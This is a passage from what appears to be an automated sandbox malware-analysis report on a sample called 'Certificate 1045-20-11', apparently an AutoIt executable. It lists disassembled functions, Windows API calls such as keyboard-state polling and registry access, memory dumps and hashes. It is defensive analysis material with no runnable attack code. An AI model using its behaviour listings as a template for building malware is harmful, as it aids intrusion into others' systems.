                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                • API String ID: 1687751970-22481851
                                                                                • Opcode ID: 801f1c859bf9b4d8a23214ca37f05735f21d0ba2e5a1d8b9822f7e7e74b794dd
                                                                                • Instruction ID: 1fedc33d7f595efdc10ed63de91746b85489c258b5c6f51c93426c7d0257b7ab
                                                                                • Opcode Fuzzy Hash: 801f1c859bf9b4d8a23214ca37f05735f21d0ba2e5a1d8b9822f7e7e74b794dd
                                                                                • Instruction Fuzzy Hash: DA410676C1062DABDB15EBA8DC85DEDB7B8FF04340F004129E905E3261EB309E05CB51
                                                                                Function 008A3C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,008A2BB5,?,?), ref: 008A3C1D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                • API String ID: 3964851224-909552448
                                                                                • Opcode ID: c593c110955d61d57a99e258b7c4cccccb9d060113db2566f19e331473332671
                                                                                • Instruction ID: 826d435b373474e29a57f84f2d089d26834a1b0e2679e0e522fc1c813777ec7a
                                                                                • Opcode Fuzzy Hash: c593c110955d61d57a99e258b7c4cccccb9d060113db2566f19e331473332671
                                                                                • Instruction Fuzzy Hash: 1D41063011024A8BEF04EE68D851AEB3365FB26344F105855FD95EB692EB70EE4E8B61
                                                                                Function 008825B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008B36F4,00000010,?,Bad directive syntax error,008DDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 008825D6
                                                                                • LoadStringW.USER32(00000000,?,008B36F4,00000010), ref: 008825DD
                                                                                • _wprintf.LIBCMT ref: 00882610
                                                                                • __swprintf.LIBCMT ref: 00882632
                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 008826A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                • API String ID: 1080873982-4153970271
                                                                                • Opcode ID: c89a6517aaeaadcb7dac1afb19e529648008836b2d826bc417703cf7ee354c9b
                                                                                • Instruction ID: 8d6c1cac22a666cb76ce0f286658e6dd553c43a2544cc6304ceb1cc531c35bec
                                                                                • Opcode Fuzzy Hash: c89a6517aaeaadcb7dac1afb19e529648008836b2d826bc417703cf7ee354c9b
                                                                                • Instruction Fuzzy Hash: C821393180021EABCF11FBA4CC4AEEE7B79FF18304F044465B615E61A2EA75A618DB52
                                                                                Function 00887AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00887B42
                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00887B58
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00887B69
                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00887B7B
                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00887B8C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: SendString
                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                • API String ID: 890592661-1007645807
                                                                                • Opcode ID: e4f3e54788a818bec00ede657497368f0e8ea404736c6f9a11f999137838b454
                                                                                • Instruction ID: fed100da16a27e51a26d94699449cc6be1ad285117aa4349e9ab742c0b03bf1d
                                                                                • Opcode Fuzzy Hash: e4f3e54788a818bec00ede657497368f0e8ea404736c6f9a11f999137838b454
                                                                                • Instruction Fuzzy Hash: 4F11C1A0A4026D79E720B379CC4ADFFBA7CFB91B10F100429B521E21D1EE705A49C6B1
                                                                                Function 0088778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • timeGetTime.WINMM ref: 00887794
                                                                                  • Part of subcall function 0085DC38: timeGetTime.WINMM(?,75C0B400,008B58AB), ref: 0085DC3C
                                                                                • Sleep.KERNEL32(0000000A), ref: 008877C0
                                                                                • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 008877E4
                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00887806
                                                                                • SetActiveWindow.USER32 ref: 00887825
                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00887833
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00887852
                                                                                • Sleep.KERNEL32(000000FA), ref: 0088785D
                                                                                • IsWindow.USER32 ref: 00887869
                                                                                • EndDialog.USER32(00000000), ref: 0088787A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                • String ID: BUTTON
                                                                                • API String ID: 1194449130-3405671355
                                                                                • Opcode ID: ffdb96814af6433ca146a1810b12c2383bd221b9b17ea7927cfd4a0192265c48
                                                                                • Instruction ID: a7b572cbb18c8e1cf6f753cd069d940c9a46c81e7705a05ef7a3223850cffa99
                                                                                • Opcode Fuzzy Hash: ffdb96814af6433ca146a1810b12c2383bd221b9b17ea7927cfd4a0192265c48
                                                                                • Instruction Fuzzy Hash: 452115B0218309AFE7157B64AC89F2A3F7DFB44349B548034F516C6262CB719D04EB65
                                                                                Function 008902EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • CoInitialize.OLE32(00000000), ref: 0089034B
                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008903DE
                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 008903F2
                                                                                • CoCreateInstance.OLE32(008CDA8C,00000000,00000001,008F3CF8,?), ref: 0089043E
                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008904AD
                                                                                • CoTaskMemFree.OLE32(?,?), ref: 00890505
                                                                                • _memset.LIBCMT ref: 00890542
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0089057E
                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008905A1
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 008905A8
                                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008905DF
                                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 008905E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                • String ID:
                                                                                • API String ID: 1246142700-0
                                                                                • Opcode ID: 4a6aa78d418b90d45308a72db7468039fa6504a2820982e9ba6eb64f37cdd206
                                                                                • Instruction ID: fe4404e6d2f814193174a376b4bf6e665e4841bebf0521af61b91a6293fd7f32
                                                                                • Opcode Fuzzy Hash: 4a6aa78d418b90d45308a72db7468039fa6504a2820982e9ba6eb64f37cdd206
                                                                                • Instruction Fuzzy Hash: 22B1EA75A00209AFDB14EFA8C888DAEBBB9FF48304B158469F905EB251DB70ED41CF51
                                                                                Function 00882E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 00882ED6
                                                                                • SetKeyboardState.USER32(?), ref: 00882F41
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00882F61
                                                                                • GetKeyState.USER32(000000A0), ref: 00882F78
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00882FA7
                                                                                • GetKeyState.USER32(000000A1), ref: 00882FB8
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00882FE4
                                                                                • GetKeyState.USER32(00000011), ref: 00882FF2
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 0088301B
                                                                                • GetKeyState.USER32(00000012), ref: 00883029
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00883052
                                                                                • GetKeyState.USER32(0000005B), ref: 00883060
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 202d78cc9dd64bd8739bf78aadf0ca615d24316fb0b20b5bf1f6cdf92fc62f24
                                                                                • Instruction ID: a7a2b9ae20c50c4b8a151c11be94f16eeed55b2453c645daec48143baa408c7e
                                                                                • Opcode Fuzzy Hash: 202d78cc9dd64bd8739bf78aadf0ca615d24316fb0b20b5bf1f6cdf92fc62f24
                                                                                • Instruction Fuzzy Hash: C951D734904B9429FB35FBA488117AABBF4FF11740F08459EC5C2DA1C3DA54AB8CC766
                                                                                Function 0087ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000001), ref: 0087ED1E
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0087ED30
                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0087ED8E
                                                                                • GetDlgItem.USER32(?,00000002), ref: 0087ED99
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0087EDAB
                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0087EE01
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0087EE0F
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0087EE20
                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0087EE63
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0087EE71
                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0087EE8E
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0087EE9B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                • String ID:
                                                                                • API String ID: 3096461208-0
                                                                                • Opcode ID: 42ca953f9da4f554f7f5d841092898355bfef9d784c99e8a039e960b9a9bedc6
                                                                                • Instruction ID: dd4cf0b5b88e1857c3c344bff4a8a670175958203edca97f47b03db4610aa512
                                                                                • Opcode Fuzzy Hash: 42ca953f9da4f554f7f5d841092898355bfef9d784c99e8a039e960b9a9bedc6
                                                                                • Instruction Fuzzy Hash: 8E510AB1B00205ABDB18DF68DD89EAEBBBAFB98300F148569F519D7294D770ED00CB50
                                                                                Function 0085B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0085B759,?,00000000,?,?,?,?,0085B72B,00000000,?), ref: 0085BA58
                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0085B72B), ref: 0085B7F6
                                                                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0085B72B,00000000,?,?,0085B2EF,?,?), ref: 0085B88D
                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 008BD8A6
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0085B72B,00000000,?,?,0085B2EF,?,?), ref: 008BD8D7
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0085B72B,00000000,?,?,0085B2EF,?,?), ref: 008BD8EE
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0085B72B,00000000,?,?,0085B2EF,?,?), ref: 008BD90A
                                                                                • DeleteObject.GDI32(00000000), ref: 008BD91C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 641708696-0
                                                                                • Opcode ID: 05cb8d7305985f766bd0d59949c87082b4a5e1474124199abb8b7c5195c28f08
                                                                                • Instruction ID: 8369c4323e1f9859f5df6e78a5c404825d7331e9d5c1d639ec66042c67c65d0a
                                                                                • Opcode Fuzzy Hash: 05cb8d7305985f766bd0d59949c87082b4a5e1474124199abb8b7c5195c28f08
                                                                                • Instruction Fuzzy Hash: D4619831511B00EFDB269F18DC88B65BBF5FFA4316F14452DE886C7A60CB31A898DB80
                                                                                Function 0085B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085B526: GetWindowLongW.USER32(?,000000EB), ref: 0085B537
                                                                                • GetSysColor.USER32(0000000F), ref: 0085B438
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ColorLongWindow
                                                                                • String ID:
                                                                                • API String ID: 259745315-0
                                                                                • Opcode ID: 2dbfadd25842ac2cd6e9c65e9743a38629aabb01a420e264853a3d67c74c1c79
                                                                                • Instruction ID: 93b941ca1f42a9b7b08004ca59f82eb33e3283c1b9e1796a5f801f859e927882
                                                                                • Opcode Fuzzy Hash: 2dbfadd25842ac2cd6e9c65e9743a38629aabb01a420e264853a3d67c74c1c79
                                                                                • Instruction Fuzzy Hash: CA418C31100244AFDB306F28DC89BB93B66FB66736F188265FD65CA1E6D7308C46DB25
                                                                                Function 0088690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                • String ID:
                                                                                • API String ID: 136442275-0
                                                                                • Opcode ID: 8d3bb9023746c6a25118ba9cd5036333223b42844791b344a16cfad16e7d5c99
                                                                                • Instruction ID: 333aa2bc90eb1049ee628f94527ca10dde40fbec7cb1c715772a18dee7908296
                                                                                • Opcode Fuzzy Hash: 8d3bb9023746c6a25118ba9cd5036333223b42844791b344a16cfad16e7d5c99
                                                                                • Instruction Fuzzy Hash: 21411C7688512CAECF65EB94CC46DDB73BCFB44310F0041A6F659E2151EA30ABE48F55
                                                                                Function 0088D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(008DDC00,008DDC00,008DDC00), ref: 0088D7CE
                                                                                • GetDriveTypeW.KERNEL32(?,008F3A70,00000061), ref: 0088D898
                                                                                • _wcscpy.LIBCMT ref: 0088D8C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                • API String ID: 2820617543-1000479233
                                                                                • Opcode ID: 846e84ff450eaae526d163aba72cd39d6279a81bacdd1d5ffc5e89040fcad1d5
                                                                                • Instruction ID: 92104222ac8f92c28c67356509634f561305c310429666755c2dfc6d4a8ca08a
                                                                                • Opcode Fuzzy Hash: 846e84ff450eaae526d163aba72cd39d6279a81bacdd1d5ffc5e89040fcad1d5
                                                                                • Instruction Fuzzy Hash: 78515D31114304AFC714FF18D892A6AB7A5FF94314F10892DF99AD72A2DB31DE09CB42
                                                                                Function 0084936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __swprintf.LIBCMT ref: 008493AB
                                                                                • __itow.LIBCMT ref: 008493DF
                                                                                  • Part of subcall function 00861557: _xtow@16.LIBCMT ref: 00861578
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __itow__swprintf_xtow@16
                                                                                • String ID: %.15g$0x%p$False$True
                                                                                • API String ID: 1502193981-2263619337
                                                                                • Opcode ID: 8a96c4421c4a810422feec5dbc49dfac7cdd90e717be1f46d11f36403eb0608e
                                                                                • Instruction ID: e68daef317ff2c7123d21e4ff296721cf4c5d0d125d1d934bdcfe0598a0196a3
                                                                                • Opcode Fuzzy Hash: 8a96c4421c4a810422feec5dbc49dfac7cdd90e717be1f46d11f36403eb0608e
                                                                                • Instruction Fuzzy Hash: E541E43150020CABDB24DF78D942EAAB7E8FF45304F24546AE68AD7383EA319941CB11
                                                                                Function 008AA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008AA259
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 008AA260
                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008AA273
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 008AA27B
                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 008AA286
                                                                                • DeleteDC.GDI32(00000000), ref: 008AA28F
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 008AA299
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008AA2AD
                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 008AA2B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                • String ID: static
                                                                                • API String ID: 2559357485-2160076837
                                                                                • Opcode ID: d1165e0c88f4264afb7fd8cf14a94524dc350cc55b893886e9f21ffe525c045f
                                                                                • Instruction ID: 9f8bd2cf55254b12fd96fb29ef042b1a0fbd9447b0b72728a8ff6d297170535b
                                                                                • Opcode Fuzzy Hash: d1165e0c88f4264afb7fd8cf14a94524dc350cc55b893886e9f21ffe525c045f
